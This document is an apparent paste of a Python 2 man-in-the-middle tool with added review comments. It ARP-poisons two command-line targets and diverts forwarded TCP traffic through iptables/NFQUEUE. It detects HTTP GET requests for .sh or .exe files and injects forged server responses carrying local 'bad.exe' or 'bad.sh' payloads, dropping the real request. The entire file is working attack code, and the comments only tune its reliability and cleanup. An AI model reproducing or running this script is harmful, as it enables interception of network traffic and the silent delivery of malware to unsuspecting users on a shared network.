Untitled

a guest
Feb 18th, 2019
  1. #!/usr/bin/python2
  2.  
import os
import socket
import subprocess
import sys
import threading

import netifaces
from netfilterqueue import NetfilterQueue
from scapy.all import *
from termcolor import colored
  11.  
#host2 = "172.30.0.1"
#host1 = "172.30.122.38"
# Victim pair, taken straight from the command line with no argument-count
# check: running with fewer than two arguments dies with IndexError here.
host2 = sys.argv[2]
host1 = sys.argv[1]
# Not referenced anywhere else in this file.
router_ip = "10.0.0.1"
#my_mac = "52:54:00:80:3b:32"
# Hard-coded MAC used only by ``unmitm`` to restore host2's ARP entry for
# host1 -- presumably host1's real MAC; it is never discovered at runtime.
target_mac = "52:54:00:80:3b:32"
# Our own MAC, read from the *second* interface netifaces enumerates.
# NOTE(review): assumes that index is the attack-facing NIC -- the
# enumeration order is not guaranteed; confirm on the target machine.
my_mac = netifaces.ifaddresses(netifaces.interfaces()[1])[netifaces.AF_LINK][0]['addr']

# Per-packet flags shared (unsynchronized) across the worker threads that
# ``start`` spawns; ``callback`` both writes and reads them.
should_replace = False
should_drop = False  # assigned here and nowhere else in this file
is_exe = False

# Divert every forwarded TCP packet to NFQUEUE 1. This runs at import time,
# before ``main`` binds a listener to the queue, and only ``main``'s
# KeyboardInterrupt path removes it again. Nothing visible here enables
# IP forwarding; the FORWARD chain only sees traffic if that is on already.
os.system('iptables -A FORWARD -p tcp -j NFQUEUE --queue-num 1')
  26.  
def callback(packet, temp):
    # Per-packet worker; ``start`` runs one of these on its own daemon thread
    # for every queued packet. ``packet`` is the NetfilterQueue packet,
    # ``temp`` is the literal "hello" passed by ``start`` and is never read.
    #
    # NOTE(review): ``should_replace`` / ``is_exe`` are module globals that
    # are written and then read here with no lock, while several of these
    # threads can be in flight at once -- two packets can see each other's
    # flags (e.g. a .sh match served with bad.exe, or a non-matching packet
    # replaced because another thread set the flag a moment earlier).
    global should_replace
    global is_exe

    payload = packet.get_payload()
    pkt = IP(payload)
    # Raw TCP payload as text with CRLF folded to LF (see ``print_get``).
    data = print_get(pkt)

    # A packet with no Raw layer presumably yields just "\n" from sprintf,
    # so this guard is also what keeps ``pkt['TCP'].load`` below from
    # failing on payload-less segments.
    if len(str(data)) > 5:
        print("*"*80)
        print(str(packet) + "\n")
        print(str(pkt['TCP'].load))
        # Plain substring tests over the whole payload: "GET" and ".sh"
        # appearing anywhere (path, Host header, cookie, ...) count as a
        # match; nothing parses the request line.
        if "GET" in data and ".sh" in data:
            should_replace = True
            is_exe = False
            print(colored("Found GET request for .sh file", "green"))

        # Checked second, so a payload containing both ".sh" and ".exe"
        # ends up with is_exe = True.
        if "GET" in data and ".exe" in data:
            should_replace = True
            is_exe = True
            print(colored("Found GET request for .exe file", "green"))

    if should_replace:
        # Reset immediately so the flag is only momentarily true.
        should_replace = False
        print(colored("Replacing this packet", "red"))
        print("Destination: " + str(pkt['IP'].dst) + ", Source: " + str(pkt['IP'].src))
        print("Source Port: " + str(pkt['TCP'].sport) + ", Dest Port: " + str(pkt['TCP'].dport))
        print("Sequence is: " + str(pkt['TCP'].seq) + ", ACK is: " + str(pkt['TCP'].ack))
        # Placeholder only; always overwritten by one of the reads below.
        bad = "THIS IS EVIL"


        # Python 2 text-mode read; on Linux this returns the file bytes
        # unchanged (``str`` is bytes under 2.x) -- TODO confirm platform.
        if is_exe:
            with open('bad.exe') as f:
                bad = f.read()
        else:
            with open('bad.sh') as f:
                bad = f.read()
        # Hand-built HTTP/1.1 response. Content-Length is the body size;
        # Content-type is text/html regardless of which file was read.
        bad = ("HTTP/1.1 200 OK\r\n" +
               "Server: Apache\r\n" +
               "Content-Length: " + str(len(bad)) + "\r\n" +
               "Connection: close\r\n" +
               "Content-type: text/html\r\n" +
               "\r\n" + bad)

        # Bytes of the client's request we are acknowledging.
        length = len(pkt['TCP'].payload)

        # Reply impersonating the server: addresses and ports swapped,
        # SEQ = the client's ACK, ACK = client's SEQ + request length,
        # PSH|ACK. The whole response goes in this single segment and no
        # FIN follows it despite the "Connection: close" header.
        s = IP(src=pkt['IP'].dst, dst=pkt['IP'].src) / TCP(sport=pkt['TCP'].dport, dport=pkt['TCP'].sport, flags='PA', seq=pkt['TCP'].ack, ack=pkt['TCP'].seq + length) / str(bad)
        print("")
        print(s['TCP'].load)

        print(colored("Successfully built packet", "green"))

        send(s)

        print(colored("Sent forged packet", "green"))
        # Drop the original GET so the real server never sees it.
        packet.drop()
        return

    # Everything not replaced is forwarded untouched.
    packet.accept()
  86.  
def print_get(packet):
    """Return *packet*'s Raw payload as text with CRLF line ends folded to LF.

    Goes through scapy's conditional ``sprintf`` format, so a packet that
    has no Raw layer presumably comes back as just the trailing newline
    rather than raising. Name kept for the existing callers; it prints nothing.
    """
    raw_text = packet.sprintf("{Raw:%Raw.load%}\n")
    # Equivalent to joining the "\r\n"-split pieces with "\n".
    return raw_text.replace("\r\n", "\n")
  90.  
def mitm():
    # One-shot ARP cache poisoning of both targets: each side is sent an
    # unsolicited "is-at" reply claiming the other side's IP. ``hwsrc`` is
    # not set, so whatever scapy fills in by default (presumably the sending
    # interface's MAC) is what the victims cache. ``hwdst`` is set to our own
    # MAC rather than the victim's -- NOTE(review): looks unintentional,
    # confirm. ``main`` calls this exactly once and nothing re-sends it, so
    # the poisoned entries presumably age out on their own.
    send(ARP(op=ARP.is_at, psrc=host1, pdst=host2, hwdst=my_mac))
    send(ARP(op=ARP.is_at, psrc=host2, pdst=host1, hwdst=my_mac))
  94.  
def unmitm():
    # Best-effort repair of ``mitm``: tell host2 that host1 is back at the
    # hard-coded ``target_mac``.
    # NOTE(review): asymmetric -- host1's cached entry for host2 is never
    # restored, and ``target_mac`` is a fixed literal rather than host1's
    # observed MAC, so host2 is left with a wrong entry if the literal is.
    send(ARP(op=ARP.is_at, psrc=host1, pdst=host2, hwdst=target_mac))
  97.  
  98.  
def start(packet):
    """NFQUEUE callback bound in ``main``: hand *packet* to ``callback``.

    Each packet gets its own daemon thread (presumably so the queue's run
    loop is not held up while ``callback`` builds and sends a reply); the
    second argument is the unused ``"hello"`` that ``callback`` expects.
    """
    worker = threading.Thread(target=callback, args=(packet, "hello"))
    worker.daemon = True
    worker.start()
  103.  
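def main():
    """Entry point: poison the two targets' ARP caches, then serve the
    NFQUEUE filter loop until interrupted.

    Teardown runs in ``finally`` so the FORWARD -> NFQUEUE rule added at
    import time is removed even when ``q.run()`` dies on something other
    than Ctrl-C; a leftover NFQUEUE rule with no listener bound to queue 1
    would presumably stall every forwarded TCP packet on this host.
    Only the rule this script added is deleted: the previous
    ``iptables -F`` / ``iptables -X`` wiped every rule and user chain on the
    machine, including firewall policy unrelated to this tool.
    """
    print("=" * 80)
    print("Setting up MITM...")
    mitm()
    print("=" * 80)
    q = NetfilterQueue()
    q.bind(1, start)
    try:
        q.run()  # Main loop
    except KeyboardInterrupt:
        print("")
    finally:
        print("Re-arping targets")
        unmitm()
        print("Unbinding queue")
        q.unbind()
        print("Clearing iptable settings")
        # Delete exactly the rule appended at module import (argument list,
        # no shell). -F/-X would also destroy pre-existing configuration.
        subprocess.call(
            ["iptables", "-D", "FORWARD", "-p", "tcp",
             "-j", "NFQUEUE", "--queue-num", "1"]
        )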
  122.  
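if __name__ == "__main__":
    # Guard so importing this module (e.g. from a test) does not start the
    # MITM loop. The iptables rule added at module level still runs on import.
    main()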